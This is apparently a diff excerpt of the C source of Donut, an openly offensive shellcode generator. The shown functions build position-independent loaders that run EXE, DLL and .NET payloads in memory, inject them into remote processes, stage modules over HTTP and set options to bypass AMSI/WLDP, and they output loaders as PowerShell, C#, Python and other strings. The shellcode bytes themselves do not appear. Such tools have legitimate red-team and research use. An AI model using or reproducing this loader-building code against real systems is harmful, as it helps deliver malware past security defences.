1114 int err = DONUT_ERROR_OK;
1115 FILE *fd;
9651116
9661117 // if DEBUG is defined, save instance to disk
9671118 #ifdef DEBUG
968 DPRINT("Saving instance to file");
969 fd = fopen("instance", "wb");
970
971 if(fd != NULL) {
972 fwrite(c->inst, 1, c->inst_len, fd);
973 fclose(fd);
974 }
1119 DPRINT("Saving instance %p to file. %" PRId32 " bytes.", c->inst, c->inst_len);
1120 save_file("instance", c->inst, c->inst_len);
9751121 #endif
976 // 3. If the module will be stored on a remote server
977 if(c->inst_type == DONUT_INSTANCE_URL) {
978 DPRINT("Saving %s to disk.", c->modname);
979 // save the module to disk using random name
980 fd = fopen(c->modname, "wb");
981
982 if(fd != NULL) {
983 fwrite(c->mod, 1, c->mod_len, fd);
984 fclose(fd);
985 }
986 }
987 // 4. calculate size of PIC + instance combined
1122
1123 // If the module will be stored on a remote server
1124 if(c->inst_type == DONUT_INSTANCE_HTTP) {
1125 DPRINT("Saving %s to file.", c->modname);
1126 save_file(c->modname, c->mod, c->mod_len);
1127 }
1128
1129 // no output file specified?
1130 if(c->output[0] == 0) {
1131 // set to default name based on format
1132 switch(c->format) {
1133 case DONUT_FORMAT_BINARY:
1134 strncpy(c->output, "loader.bin", DONUT_MAX_NAME-1);
1135 break;
1136 case DONUT_FORMAT_BASE64:
1137 strncpy(c->output, "loader.b64", DONUT_MAX_NAME-1);
1138 break;
1139 case DONUT_FORMAT_RUBY:
1140 strncpy(c->output, "loader.rb", DONUT_MAX_NAME-1);
1141 break;
1142 case DONUT_FORMAT_C:
1143 strncpy(c->output, "loader.c", DONUT_MAX_NAME-1);
1144 break;
1145 case DONUT_FORMAT_PYTHON:
1146 strncpy(c->output, "loader.py", DONUT_MAX_NAME-1);
1147 break;
1148 case DONUT_FORMAT_POWERSHELL:
1149 strncpy(c->output, "loader.ps1", DONUT_MAX_NAME-1);
1150 break;
1151 case DONUT_FORMAT_CSHARP:
1152 strncpy(c->output, "loader.cs", DONUT_MAX_NAME-1);
1153 break;
1154 case DONUT_FORMAT_HEX:
1155 strncpy(c->output, "loader.hex", DONUT_MAX_NAME-1);
1156 break;
1157 }
1158 }
1159 // save loader to file
1160 fd = fopen(c->output, "wb");
1161 if(fd == NULL) {
1162 DPRINT("Opening %s failed.", c->output);
1163 return DONUT_ERROR_FILE_ACCESS;
1164 }
1165
1166 switch(c->format) {
1167 case DONUT_FORMAT_BINARY: {
1168 DPRINT("Saving loader as binary");
1169 fwrite(c->pic, 1, c->pic_len, fd);
1170 err = DONUT_ERROR_OK;
1171 break;
1172 }
1173 case DONUT_FORMAT_BASE64: {
1174 DPRINT("Saving loader as base64 string");
1175 err = base64_template(c->pic, c->pic_len, fd);
1176 break;
1177 }
1178 case DONUT_FORMAT_RUBY:
1179 case DONUT_FORMAT_C:
1180 DPRINT("Saving loader as C/Ruby string");
1181 err = c_ruby_template(c->pic, c->pic_len, fd);
1182 break;
1183 case DONUT_FORMAT_PYTHON:
1184 DPRINT("Saving loader as Python string");
1185 err = py_template(c->pic, c->pic_len, fd);
1186 break;
1187 case DONUT_FORMAT_POWERSHELL:
1188 DPRINT("Saving loader as Powershell string");
1189 err = powershell_template(c->pic, c->pic_len, fd);
1190 break;
1191 case DONUT_FORMAT_CSHARP:
1192 DPRINT("Saving loader as C# string");
1193 err = csharp_template(c->pic, c->pic_len, fd);
1194 break;
1195 case DONUT_FORMAT_HEX:
1196 DPRINT("Saving loader as Hex string");
1197 err = hex_template(c->pic, c->pic_len, fd);
1198 break;
1199 }
1200 fclose(fd);
1201 DPRINT("Leaving with error : %" PRId32, err);
1202 return err;
1203 }
1204
1205 /**
1206 * Function: build_loader
1207 * ----------------------------
1208 * Builds the shellcode that's injected into remote process.
1209 *
1210 * INPUT : Donut configuration.
1211 *
1212 * OUTPUT : Donut error code.
1213 */
1214 static int build_loader(PDONUT_CONFIG c) {
1215 uint8_t *pl;
1216 uint32_t t;
1217
1218 // target is x86?
9881219 if(c->arch == DONUT_ARCH_X86) {
989 c->pic_len = sizeof(PAYLOAD_EXE_X86) + c->inst_len + 32;
1220 c->pic_len = sizeof(LOADER_EXE_X86) + c->inst_len + 32;
9901221 } else
1222 // target is amd64?
9911223 if(c->arch == DONUT_ARCH_X64) {
992 c->pic_len = sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
1224 c->pic_len = sizeof(LOADER_EXE_X64) + c->inst_len + 32;
9931225 } else
1226 // target can be both x86 and amd64?
9941227 if(c->arch == DONUT_ARCH_X84) {
995 c->pic_len = sizeof(PAYLOAD_EXE_X86) +
996 sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
997 }
998 // 5. allocate memory for shellcode
1228 c->pic_len = sizeof(LOADER_EXE_X86) +
1229 sizeof(LOADER_EXE_X64) + c->inst_len + 32;
1230 }
1231 // allocate memory for shellcode
9991232 c->pic = malloc(c->pic_len);
1000
1001 DPRINT("PIC size : %" PRIi64, c->pic_len);
1002
1233
10031234 if(c->pic == NULL) {
1004 err = DONUT_ERROR_NO_MEMORY;
1005 goto cleanup;
1235 DPRINT("Unable to allocate %" PRId32 " bytes of memory for loader.", c->pic_len);
1236 return DONUT_ERROR_NO_MEMORY;
10061237 }
10071238
10081239 DPRINT("Inserting opcodes");
1009 // 6. insert shellcode
1240
1241 // insert shellcode
10101242 pl = (uint8_t*)c->pic;
1243
10111244 // call $ + c->inst_len
10121245 PUT_BYTE(pl, 0xE8);
10131246 PUT_WORD(pl, c->inst_len);
10241257 // push edx
10251258 PUT_BYTE(pl, 0x52);
10261259
1027 DPRINT("Copying %" PRIi64 " bytes of x86 shellcode",
1028 (uint64_t)sizeof(PAYLOAD_EXE_X86));
1260 DPRINT("Copying %" PRIi32 " bytes of x86 shellcode",
1261 (uint32_t)sizeof(LOADER_EXE_X86));
10291262
1030 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1263 PUT_BYTES(pl, LOADER_EXE_X86, sizeof(LOADER_EXE_X86));
10311264 } else
10321265 // AMD64?
10331266 if(c->arch == DONUT_ARCH_X64) {
10341267
1035 DPRINT("Copying %" PRIi64 " bytes of amd64 shellcode",
1036 (uint64_t)sizeof(PAYLOAD_EXE_X64));
1037
1038 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1268 DPRINT("Copying %" PRIi32 " bytes of amd64 shellcode",
1269 (uint32_t)sizeof(LOADER_EXE_X64));
1270
1271 // ensure stack is 16-byte aligned for x64 for Microsoft x64 calling convention
1272
1273 // and rsp, -0x10
1274 PUT_BYTE(pl, 0x48);
1275 PUT_BYTE(pl, 0x83);
1276 PUT_BYTE(pl, 0xE4);
1277 PUT_BYTE(pl, 0xF0);
1278 // push rcx
1279 // this is just for alignment, any 8 bytes would do
1280 PUT_BYTE(pl, 0x51);
1281
1282 PUT_BYTES(pl, LOADER_EXE_X64, sizeof(LOADER_EXE_X64));
10391283 } else
10401284 // x86 + AMD64?
10411285 if(c->arch == DONUT_ARCH_X84) {
10421286
1043 DPRINT("Copying %" PRIi64 " bytes of x86 + amd64 shellcode",
1044 (uint64_t)(sizeof(PAYLOAD_EXE_X86) + sizeof(PAYLOAD_EXE_X64)));
1287 DPRINT("Copying %" PRIi32 " bytes of x86 + amd64 shellcode",
1288 (uint32_t)(sizeof(LOADER_EXE_X86) + sizeof(LOADER_EXE_X64)));
10451289
10461290 // xor eax, eax
10471291 PUT_BYTE(pl, 0x31);
10511295 // js dword x86_code
10521296 PUT_BYTE(pl, 0x0F);
10531297 PUT_BYTE(pl, 0x88);
1054 PUT_WORD(pl, sizeof(PAYLOAD_EXE_X64));
1055 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1298 PUT_WORD(pl, sizeof(LOADER_EXE_X64) + 5);
1299
1300 // ensure stack is 16-byte aligned for x64 for Microsoft x64 calling convention
1301
1302 // and rsp, -0x10
1303 PUT_BYTE(pl, 0x48);
1304 PUT_BYTE(pl, 0x83);
1305 PUT_BYTE(pl, 0xE4);
1306 PUT_BYTE(pl, 0xF0);
1307 // push rcx
1308 // this is just for alignment, any 8 bytes would do
1309 PUT_BYTE(pl, 0x51);
1310
1311 PUT_BYTES(pl, LOADER_EXE_X64, sizeof(LOADER_EXE_X64));
10561312 // pop edx
10571313 PUT_BYTE(pl, 0x5A);
10581314 // push ecx
10591315 PUT_BYTE(pl, 0x51);
10601316 // push edx
10611317 PUT_BYTE(pl, 0x52);
1062 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1063 }
1064 cleanup:
1318 PUT_BYTES(pl, LOADER_EXE_X86, sizeof(LOADER_EXE_X86));
1319 }
1320 return DONUT_ERROR_OK;
1321 }
1322
1323 /**
1324 * Function: validate_loader_cfg
1325 * ----------------------------
1326 * Validates Donut configuration for loader.
1327 *
1328 * INPUT : Pointer to a Donut configuration.
1329 *
1330 * OUTPUT : Donut error code.
1331 */
1332 static int validate_loader_cfg(PDONUT_CONFIG c) {
1333 uint32_t url_len;
1334
1335 DPRINT("Validating loader configuration.");
1336
1337 if(c == NULL || c->input[0] == 0) {
1338 DPRINT("No configuration or input file provided.");
1339 return DONUT_ERROR_INVALID_PARAMETER;
1340 }
1341
1342 if(c->inst_type != DONUT_INSTANCE_EMBED &&
1343 c->inst_type != DONUT_INSTANCE_HTTP) {
1344
1345 DPRINT("Instance type %" PRIx32 " is invalid.", c->inst_type);
1346 return DONUT_ERROR_INVALID_PARAMETER;
1347 }
1348
1349 if(c->format < DONUT_FORMAT_BINARY || c->format > DONUT_FORMAT_HEX) {
1350 DPRINT("Format type %" PRId32 " is invalid.", c->format);
1351 return DONUT_ERROR_INVALID_FORMAT;
1352 }
1353
1354 #ifdef WINDOWS
1355 if(c->compress != DONUT_COMPRESS_NONE &&
1356 c->compress != DONUT_COMPRESS_APLIB &&
1357 c->compress != DONUT_COMPRESS_LZNT1 &&
1358 c->compress != DONUT_COMPRESS_XPRESS)
1359 {
1360 DPRINT("Compression engine %" PRId32 " is invalid.", c->compress);
1361 return DONUT_ERROR_INVALID_ENGINE;
1362 }
1363 #else
1364 if(c->compress != DONUT_COMPRESS_NONE &&
1365 c->compress != DONUT_COMPRESS_APLIB)
1366 {
1367 DPRINT("Compression engine %" PRId32 " is invalid.", c->compress);
1368 return DONUT_ERROR_INVALID_ENGINE;
1369 }
1370 #endif
1371
1372 if(c->entropy != DONUT_ENTROPY_NONE &&
1373 c->entropy != DONUT_ENTROPY_RANDOM &&
1374 c->entropy != DONUT_ENTROPY_DEFAULT)
1375 {
1376 DPRINT("Entropy level %" PRId32 " is invalid.", c->entropy);
1377 return DONUT_ERROR_INVALID_ENTROPY;
1378 }
1379
1380 if(c->inst_type == DONUT_INSTANCE_HTTP) {
1381 // no URL? exit
1382 if(c->server[0] == 0) {
1383 DPRINT("Error: No HTTP server provided.");
1384 return DONUT_ERROR_INVALID_PARAMETER;
1385 }
1386 // doesn't begin with one of the following? exit
1387 if((strnicmp(c->server, "http://", 7) != 0) &&
1388 (strnicmp(c->server, "https://", 8) != 0)) {
1389
1390 DPRINT("URL is invalid : %s", c->server);
1391 return DONUT_ERROR_INVALID_URL;
1392 }
1393 // invalid length?
1394 url_len = (uint32_t)strlen(c->server);
1395
1396 if(url_len <= 8) {
1397 DPRINT("URL length : %" PRId32 " is invalid.", url_len);
1398 return DONUT_ERROR_URL_LENGTH;
1399 }
1400 // if the end of string doesn't have a forward slash
1401 // add one more to account for it
1402 if(c->server[url_len - 1] != '/') {
1403 c->server[url_len] = '/';
1404 url_len++;
1405 }
1406
1407 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_NAME) {
1408 DPRINT("URL length : %" PRId32 " exceeds size of buffer : %"PRId32,
1409 url_len+DONUT_MAX_MODNAME, DONUT_MAX_NAME);
1410 return DONUT_ERROR_URL_LENGTH;
1411 }
1412 }
1413
1414 if(c->arch != DONUT_ARCH_X86 &&
1415 c->arch != DONUT_ARCH_X64 &&
1416 c->arch != DONUT_ARCH_X84 &&
1417 c->arch != DONUT_ARCH_ANY)
1418 {
1419 DPRINT("Target architecture %"PRId32 " is invalid.", c->arch);
1420 return DONUT_ERROR_INVALID_ARCH;
1421 }
1422
1423 if(c->bypass != DONUT_BYPASS_NONE &&
1424 c->bypass != DONUT_BYPASS_ABORT &&
1425 c->bypass != DONUT_BYPASS_CONTINUE)
1426 {
1427 DPRINT("Option to bypass AMSI/WDLP %"PRId32" is invalid.", c->bypass);
1428 return DONUT_ERROR_BYPASS_INVALID;
1429 }
1430
1431 if(c->headers != DONUT_HEADERS_OVERWRITE &&
1432 c->headers != DONUT_HEADERS_KEEP)
1433 {
1434 DPRINT("Option to preserve PE headers (or not) %"PRId32" is invalid.", c->headers);
1435 return DONUT_ERROR_HEADERS_INVALID;
1436 }
1437
1438 DPRINT("Loader configuration passed validation.");
1439 return DONUT_ERROR_OK;
1440 }
1441
1442 /**
1443 * Function: is_dll_export
1444 * ----------------------------
1445 * Validates if a DLL exports a function.
1446 *
1447 * INPUT : Name of DLL function to check.
1448 *
1449 * OUTPUT : 1 if found, else 0
1450 */
1451 static int is_dll_export(const char *function) {
1452 PIMAGE_DATA_DIRECTORY dir;
1453 PIMAGE_EXPORT_DIRECTORY exp;
1454 DWORD rva, cnt;
1455 ULONG64 ofs;
1456 PDWORD sym;
1457 PCHAR str;
1458 int found = 0;
1459
1460 DPRINT("Entering.");
1461
1462 dir = Dirs(fi.data);
1463 if(dir != NULL) {
1464 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
1465 DPRINT("EAT VA : %lx", rva);
1466 if(rva != 0) {
1467 ofs = rva2ofs(fi.data, rva);
1468 DPRINT("Offset = %" PRIX64 "\n", ofs);
1469 if(ofs != -1) {
1470 exp = (PIMAGE_EXPORT_DIRECTORY)(fi.data + ofs);
1471 cnt = exp->NumberOfNames;
1472 DPRINT("Number of exported functions : %lx", cnt);
1473
1474 if(cnt != 0) {
1475 sym = (PDWORD)(rva2ofs(fi.data, exp->AddressOfNames) + fi.data);
1476 // scan array for symbol
1477 do {
1478 str = (PCHAR)(rva2ofs(fi.data, sym[cnt - 1]) + fi.data);
1479 // if match found, exit
1480 if(strcmp(str, function) == 0) {
1481 DPRINT("Found API");
1482 found = 1;
1483 break;
1484 }
1485 } while (--cnt);
1486 }
1487 }
1488 }
1489 }
1490 DPRINT("Leaving.");
1491 return found;
1492 }
1493
1494 /**
1495 * Function: validate_file_cfg
1496 * ----------------------------
1497 * Validates configuration for the input file.
1498 *
1499 * INPUT : Pointer to Donut configuration.
1500 *
1501 * OUTPUT : Donut error code.
1502 */
1503 static int validate_file_cfg(PDONUT_CONFIG c) {
1504 DPRINT("Validating configuration for input file.");
1505
1506 // Unmanaged EXE/DLL?
1507 if(fi.type == DONUT_MODULE_DLL ||
1508 fi.type == DONUT_MODULE_EXE)
1509 {
1510 // Requested shellcode is x86, but file is x64?
1511 // Requested shellcode is x64, but file is x86?
1512 if((c->arch == DONUT_ARCH_X86 &&
1513 fi.arch == DONUT_ARCH_X64) ||
1514 (c->arch == DONUT_ARCH_X64 &&
1515 fi.arch == DONUT_ARCH_X86))
1516 {
1517 DPRINT("Target architecture %"PRId32 " is not compatible with DLL/EXE %"PRId32, c->arch, fi.arch);
1518 return DONUT_ERROR_ARCH_MISMATCH;
1519 }
1520 // DLL function specified. Does it exist?
1521 if(fi.type == DONUT_MODULE_DLL && c->method[0] != 0)
1522 {
1523 if(!is_dll_export(c->method)) {
1524 DPRINT("Unable to locate function \"%s\" in DLL", c->method);
1525 return DONUT_ERROR_DLL_FUNCTION;
1526 }
1527 }
1528 }
1529 // .NET DLL assembly?
1530 if(fi.type == DONUT_MODULE_NET_DLL) {
1531 // DLL requires class and method
1532 if(c->cls[0] == 0 || c->method[0] == 0) {
1533 DPRINT("Input file is a .NET assembly, but no class and method have been specified.");
1534 return DONUT_ERROR_NET_PARAMS;
1535 }
1536 }
1537
1538 // is this an unmanaged DLL with parameters?
1539 if(fi.type == DONUT_MODULE_DLL && c->args[0] != 0) {
1540 // we need a DLL function
1541 if(c->method[0] == 0) {
1542 DPRINT("Parameters are provided for an unmanaged/native DLL, but no function.");
1543 return DONUT_ERROR_DLL_PARAM;
1544 }
1545 }
1546 DPRINT("Validation passed.");
1547 return DONUT_ERROR_OK;
1548 }
1549
1550 /**
1551 * Function: DonutCreate
1552 * ----------------------------
1553 * Builds a position-independent loader for VBS/JS/EXE/DLL files.
1554 *
1555 * INPUT : Pointer to a Donut configuration.
1556 *
1557 * OUTPUT : Donut error code.
1558 */
1559 EXPORT_FUNC
1560 int DonutCreate(PDONUT_CONFIG c) {
1561 int err = DONUT_ERROR_OK;
1562
1563 DPRINT("Entering.");
1564
1565 c->mod = c->pic = c->inst = NULL;
1566 c->mod_len = c->pic_len = c->inst_len = 0;
1567
1568 // 1. validate the loader configuration
1569 err = validate_loader_cfg(c);
1570 if(err == DONUT_ERROR_OK) {
1571 // 2. get information about the file to execute in memory
1572 err = read_file_info(c);
1573 if(err == DONUT_ERROR_OK) {
1574 // 3. validate the module configuration
1575 err = validate_file_cfg(c);
1576 if(err == DONUT_ERROR_OK) {
1577 // 4. build the module
1578 err = build_module(c);
1579 if(err == DONUT_ERROR_OK) {
1580 // 5. build the instance
1581 err = build_instance(c);
1582 if(err == DONUT_ERROR_OK) {
1583 // 6. build the loader
1584 err = build_loader(c);
1585 if(err == DONUT_ERROR_OK) {
1586 // 7. save loader and any additional files to disk
1587 err = save_loader(c);
1588 }
1589 }
1590 }
1591 }
1592 }
1593 }
10651594 // if there was some error, release resources
1066 if(err != DONUT_ERROR_SUCCESS) {
1595 if(err != DONUT_ERROR_OK) {
10671596 DonutDelete(c);
10681597 }
1069 unmap_file(&fi);
1070 DPRINT("Leaving.");
1598 DPRINT("Leaving with error : %" PRId32, err);
10711599 return err;
10721600 }
10731601
1074 // release resources allocated for configuration
1602 /**
1603 * Function: DonutDelete
1604 * ----------------------------
1605 * Releases memory allocated by internal Donut functions.
1606 *
1607 * INPUT : Pointer to a Donut configuration previously used by DonutCreate.
1608 *
1609 * OUTPUT : Donut error code.
1610 */
10751611 EXPORT_FUNC
10761612 int DonutDelete(PDONUT_CONFIG c) {
10771613
10811617 }
10821618 // free module
10831619 if(c->mod != NULL) {
1620 DPRINT("Releasing memory for module.");
10841621 free(c->mod);
10851622 c->mod = NULL;
10861623 }
10871624 // free instance
10881625 if(c->inst != NULL) {
1626 DPRINT("Releasing memory for configuration.");
10891627 free(c->inst);
10901628 c->inst = NULL;
10911629 }
1092 // free payload
1630 // free loader
10931631 if(c->pic != NULL) {
1632 DPRINT("Releasing memory for loader.");
10941633 free(c->pic);
10951634 c->pic = NULL;
10961635 }
1636 unmap_file();
1637
10971638 DPRINT("Leaving.");
1098 return DONUT_ERROR_SUCCESS;
1099 }
1100
1101 // define when building an executable
1102 #ifdef DONUT_EXE
1103
1104 const char *err2str(int err) {
1639 return DONUT_ERROR_OK;
1640 }
1641
1642 /**
1643 * Function: DonutError
1644 * ----------------------------
1645 * Converts Donut error code into a string
1646 *
1647 * INPUT : error code returned by DonutCreate
1648 *
1649 * OUTPUT : error code as a string
1650 */
1651 EXPORT_FUNC
1652 const char *DonutError(int err) {
11051653 static const char *str="N/A";
11061654
11071655 switch(err) {
1108 case DONUT_ERROR_SUCCESS:
1109 str = "No error";
1656 case DONUT_ERROR_OK:
1657 str = "No error.";
11101658 break;
11111659 case DONUT_ERROR_FILE_NOT_FOUND:
1112 str = "File not found";
1660 str = "File not found.";
11131661 break;
11141662 case DONUT_ERROR_FILE_EMPTY:
1115 str = "File is empty";
1663 str = "File is empty.";
11161664 break;
11171665 case DONUT_ERROR_FILE_ACCESS:
1118 str = "Cannot open file";
1666 str = "Cannot open file.";
11191667 break;
11201668 case DONUT_ERROR_FILE_INVALID:
1121 str = "File is invalid";
1669 str = "File is invalid.";
11221670 break;
11231671 case DONUT_ERROR_NET_PARAMS:
1124 str = "File is a .NET DLL. Donut requires a class and method";
1672 str = "File is a .NET DLL. Donut requires a class and method.";
11251673 break;
11261674 case DONUT_ERROR_NO_MEMORY:
1127 str = "No memory available";
1675 str = "Memory allocation failed.";
11281676 break;
11291677 case DONUT_ERROR_INVALID_ARCH:
1130 str = "Invalid architecture specified";
1678 str = "Invalid architecture specified.";
11311679 break;
11321680 case DONUT_ERROR_INVALID_URL:
1133 str = "Invalid URL";
1681 str = "Invalid URL.";
11341682 break;
11351683 case DONUT_ERROR_URL_LENGTH:
1136 str = "Invalid URL length";
1684 str = "Invalid URL length.";
11371685 break;
11381686 case DONUT_ERROR_INVALID_PARAMETER:
1139 str = "Invalid parameter";
1687 str = "Invalid parameter.";
11401688 break;
11411689 case DONUT_ERROR_RANDOM:
1142 str = "Error generating random values";
1690 str = "Error generating random values.";
11431691 break;
11441692 case DONUT_ERROR_DLL_FUNCTION:
1145 str = "Unable to locate DLL function provided. Names are case sensitive";
1693 str = "Unable to locate DLL function provided. Names are case sensitive.";
11461694 break;
11471695 case DONUT_ERROR_ARCH_MISMATCH:
1148 str = "Target architecture cannot support selected DLL/EXE file";
1696 str = "Target architecture cannot support selected DLL/EXE file.";
11491697 break;
11501698 case DONUT_ERROR_DLL_PARAM:
1151 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function";
1699 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function.";
11521700 break;
11531701 case DONUT_ERROR_BYPASS_INVALID:
1154 str = "Invalid bypass option specified";
1155 break;
1156 }
1702 str = "Invalid bypass option specified.";
1703 break;
1704 case DONUT_ERROR_HEADERS_INVALID:
1705 str = "Invalid PE headers preservation option.";
1706 break;
1707 case DONUT_ERROR_INVALID_FORMAT:
1708 str = "The output format is invalid.";
1709 break;
1710 case DONUT_ERROR_INVALID_ENGINE:
1711 str = "The compression engine is invalid.";
1712 break;
1713 case DONUT_ERROR_COMPRESSION:
1714 str = "There was an error during compression.";
1715 break;
1716 case DONUT_ERROR_INVALID_ENTROPY:
1717 str = "Invalid entropy level specified.";
1718 break;
1719 case DONUT_ERROR_MIXED_ASSEMBLY:
1720 str = "Mixed (native and managed) assemblies are currently unsupported.";
1721 break;
1722 case DONUT_ERROR_DECOY_INVALID:
1723 str = "Path of decoy module is invalid.";
1724 break;
1725 }
1726 DPRINT("Error result : %s", str);
11571727 return str;
11581728 }
11591729
1160 static char* get_param (int argc, char *argv[], int *i) {
1161 int n = *i;
1162 if (argv[n][2] != 0) {
1163 return &argv[n][2];
1164 }
1165 if ((n+1) < argc) {
1166 *i = n + 1;
1167 return argv[n+1];
1168 }
1169 printf(" [ %c%c requires parameter\n", argv[n][0], argv[n][1]);
1170 exit (0);
1730 #ifdef DONUT_EXE
1731
1732 #define OPT_MAX_STRING 256
1733
1734 #define OPT_TYPE_NONE 1
1735 #define OPT_TYPE_STRING 2
1736 #define OPT_TYPE_DEC 3
1737 #define OPT_TYPE_HEX 4
1738 #define OPT_TYPE_FLAG 5
1739 #define OPT_TYPE_DEC64 6
1740 #define OPT_TYPE_HEX64 7
1741
1742 // structure to hold data of any type
1743 typedef union _opt_arg_t {
1744 int flag;
1745
1746 int8_t s8;
1747 uint8_t u8;
1748 int8_t *s8_ptr;
1749 uint8_t *u8_ptr;
1750
1751 int16_t s16;
1752 uint16_t u16;
1753 int16_t *s16_ptr;
1754 uint16_t *u16_ptr;
1755
1756 int32_t s32;
1757 uint32_t u32;
1758 int32_t *s32_ptr;
1759 uint32_t *u32_ptr;
1760
1761 int64_t s64;
1762 uint64_t u64;
1763 int64_t *s64_ptr;
1764 uint64_t *u64_ptr;
1765
1766 void *ptr;
1767 char str[OPT_MAX_STRING+1];
1768 } opt_arg;
1769
1770 typedef void (*void_callback_t)(void); // execute callback with no return value or argument
1771 typedef int (*arg_callback_t)(opt_arg*,void*); // process argument, optionally store in optarg
1772
1773 static int get_opt(
1774 int argc, // total number of elements in argv
1775 char *argv[], // argument array
1776 int arg_type, // type of argument expected (none, flag, decimal, hexadecimal, string)
1777 void *output, // pointer to variable that stores argument
1778 char *short_opt, // short form of option. e.g: -a
1779 char *long_opt, // long form of option. e.g: --arch
1780 void *callback) // callback function to process argument
1781 {
1782 int valid = 0, i, req = 0, opt_len, opt_type;
1783 char *args=NULL, *opt=NULL, *arg=NULL, *tmp=NULL;
1784 opt_arg *optarg = (opt_arg*)output;
1785 void_callback_t void_cb;
1786 arg_callback_t arg_cb;
1787
1788 // perform some basic validation
1789 if(argc <= 1) return 0;
1790 if(argv == NULL) return 0;
1791
1792 if(arg_type != OPT_TYPE_NONE &&
1793 arg_type != OPT_TYPE_STRING &&
1794 arg_type != OPT_TYPE_DEC &&
1795 arg_type != OPT_TYPE_HEX &&
1796 arg_type != OPT_TYPE_FLAG) return 0;
1797
1798 DPRINT("Arg type for %s, %s : %s",
1799 short_opt != NULL ? short_opt : "N/A",
1800 long_opt != NULL ? long_opt : "N/A",
1801 arg_type == OPT_TYPE_NONE ? "None" :
1802 arg_type == OPT_TYPE_STRING ? "String" :
1803 arg_type == OPT_TYPE_DEC ? "Decimal" :
1804 arg_type == OPT_TYPE_HEX ? "Hexadecimal" :
1805 arg_type == OPT_TYPE_FLAG ? "Flag" : "Unknown");
1806
1807 // for each argument in array
1808 for(i=1; i<argc && !valid; i++) {
1809 // set the current argument to examine
1810 arg = argv[i];
1811 // if it doesn't contain a switch, skip it
1812 if(*arg != '-') continue;
1813 // we have a switch. initially, we assume short form
1814 arg++;
1815 opt_type = 0;
1816 // long form? skip one more and change the option type
1817 if(*arg == '-') {
1818 arg++;
1819 opt_type++;
1820 }
1821
1822 // is an argument required by the user?
1823 req = ((arg_type != OPT_TYPE_NONE) && (arg_type != OPT_TYPE_FLAG));
1824 // use short or long form for current argument being examined
1825 opt = (opt_type) ? long_opt : short_opt;
1826 // if no form provided by user for current argument, skip it
1827 if(opt == NULL) continue;
1828 // copy string to dynamic buffer
1829 opt_len = strlen(opt);
1830 if(opt_len == 0) continue;
1831
1832 tmp = calloc(sizeof(uint8_t), opt_len + 1);
1833 if(tmp == NULL) {
1834 DPRINT("Unable to allocate memory for %s.\n", opt);
1835 continue;
1836 } else {
1837 strcpy(tmp, opt);
1838 }
1839 // tokenize the string.
1840 opt = strtok(tmp, ";");
1841 // while we have options
1842 while(opt != NULL && !valid) {
1843 // get the length
1844 opt_len = strlen(opt);
1845 // do we have a match?
1846 if(!strncmp(opt, arg, opt_len)) {
1847 //
1848 // at this point, we have a valid matching argument
1849 // if something fails from here on in, return invalid
1850 //
1851 // skip the option
1852 arg += opt_len;
1853 // an argument is *not* required
1854 if(!req) {
1855 // so is the next byte non-zero? return invalid
1856 if(*arg != 0) return 0;
1857 } else {
1858 // an argument is required
1859 // if the next byte is a colon or assignment operator, skip it.
1860 if(*arg == ':' || *arg == '=') arg++;
1861
1862 // if the next byte is zero
1863 if(*arg == 0) {
1864 // and no arguments left. return invalid
1865 if((i + 1) >= argc) return 0;
1866 args = argv[i + 1];
1867 } else {
1868 args = arg;
1869 }
1870 }
1871 // end loop
1872 valid = 1;
1873 break;
1874 }
1875 opt = strtok(NULL, ";");
1876 }
1877 if(tmp != NULL) free(tmp);
1878 }
1879
1880 // if valid option found
1881 if(valid) {
1882 DPRINT("Found match");
1883 // ..and a callback exists
1884 if(callback != NULL) {
1885 // if we have a parameter
1886 if(args != NULL) {
1887 DPRINT("Executing callback with %s.", args);
1888 // execute with parameter
1889 arg_cb = (arg_callback_t)callback;
1890 arg_cb(optarg, args);
1891 } else {
1892 DPRINT("Executing callback.");
1893 // otherwise, execute without
1894 void_cb = (void_callback_t)callback;
1895 void_cb();
1896 }
1897 } else {
1898 // there's no callback, try process ourselves
1899 if(args != NULL) {
1900 DPRINT("Parsing %s\n", args);
1901 switch(arg_type) {
1902 case OPT_TYPE_DEC:
1903 case OPT_TYPE_HEX:
1904 DPRINT("Converting %s to 32-bit binary", args);
1905 optarg->u32 = strtoul(args, NULL, arg_type == OPT_TYPE_DEC ? 10 : 16);
1906 break;
1907 case OPT_TYPE_DEC64:
1908 case OPT_TYPE_HEX64:
1909 DPRINT("Converting %s to 64-bit binary", args);
1910 optarg->u64 = strtoull(args, NULL, arg_type == OPT_TYPE_DEC64 ? 10 : 16);
1911 break;
1912 case OPT_TYPE_STRING:
1913 DPRINT("Copying %s to output", args);
1914 strncpy(optarg->str, args, OPT_MAX_STRING);
1915 break;
1916 }
1917 } else {
1918 // there's no argument, just set the flag
1919 DPRINT("Setting flag");
1920 optarg->flag = 1;
1921 }
1922 }
1923 }
1924 // return result
1925 return valid;
1926 }
1927
1928 // callback to validate architecture
1929 static int validate_arch(opt_arg *arg, void *args) {
1930 char *str = (char*)args;
1931
1932 arg->u32 = 0;
1933 if(str == NULL) return 0;
1934
1935 // single digit? convert to binary
1936 if(strlen(str) == 1 && isdigit((int)*str)) {
1937 arg->u32 = atoi(str);
1938 } else {
1939 // otherwise, try map it to digit
1940 if(!strcasecmp("x86", str)) {
1941 arg->u32 = DONUT_ARCH_X86;
1942 } else
1943 if(!strcasecmp("amd64", str)) {
1944 arg->u32 = DONUT_ARCH_X64;
1945 } else
1946 if(!strcasecmp("x84", str)) {
1947 arg->u32 = DONUT_ARCH_X84;
1948 }
1949 }
1950
1951 // validate
1952 switch(arg->u32) {
1953 case DONUT_ARCH_X86:
1954 case DONUT_ARCH_X64:
1955 case DONUT_ARCH_X84:
1956 break;
1957 default: {
1958 printf("WARNING: Invalid architecture specified: %"PRId32" -- setting to x86+amd64\n", arg->u32);
1959 arg->u32 = DONUT_ARCH_X84;
1960 }
1961 }
1962 return 1;
1963 }
1964
